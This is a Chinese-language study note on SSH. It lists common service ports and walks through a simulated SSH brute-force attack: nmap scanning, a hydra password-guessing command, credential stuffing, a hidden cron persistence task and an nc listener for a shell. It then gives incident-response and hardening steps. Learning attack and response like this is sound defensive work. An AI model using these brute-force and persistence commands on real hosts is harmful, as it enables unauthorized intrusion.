SSH是什么?
安全外壳协议:SSH(Secure Shell),加密网络传输协议
用途:远程登陆系统
Xshell、Moba
常见端口对应服务
22——SSH
445——smb——ms17-010(永恒之蓝)
3306——mysql
3389——rdp远程桌面连接服务
80——http
443——https
模拟SSH爆破攻击
1、信息收集:nmap
2、尝试爆破:hydra进行爆破,hydra -L ysers.txt -P password.txt ssh://ip
撞库:别的网站的字典
3、登录:ssh username@ip
4、尝试创建隐藏计划任务(权限维持)
进入 /tmp 目录创建task.sh文件
1 | |
创建create_task.sh
1 | |
chmod +x create_task.sh
执行:./create_task.sh
5、尝试nc连接目标主机的shell
nc -lvp 端口
SSH爆破应急响应
netstat -antpl
列出系统上所有的网络套接字连接情况,看ip,本机可疑,有bash很可疑
pstree -p
看一下进程树,找bash
systemctl status 进程号
观察可疑文件具体是什么
cat -A /var/spool/cron/crontabs/root
查看计划任务
找到文件路径
ls -l 文件路径
查看文件属性信息,上传时间,权限
cat 文件路径
查看文件写了什么
last -f /var/log/wtmp
查看登录日志溯源
查看登录成功的日志: last -f /var/log/wtmp 找到攻击者ip
查看登录失败的日志:last -f /var/log/btmp
如果登陆失败日志很多则表示被爆破
crontab -r -u root
删除隐藏的计划任务
然后再次查看一下:cat -A /var/spool/cron/crontabs/root
kill 恶意进程号
杀掉恶意进程
rm 恶意文件
进入目录删除恶意文件
passwd root
修改root密码
vim /etc/ssh/sshd_config
修改ssh默认端口
关闭root用户远程连接的权限:修改PermitRootLogin为no,增强权限控制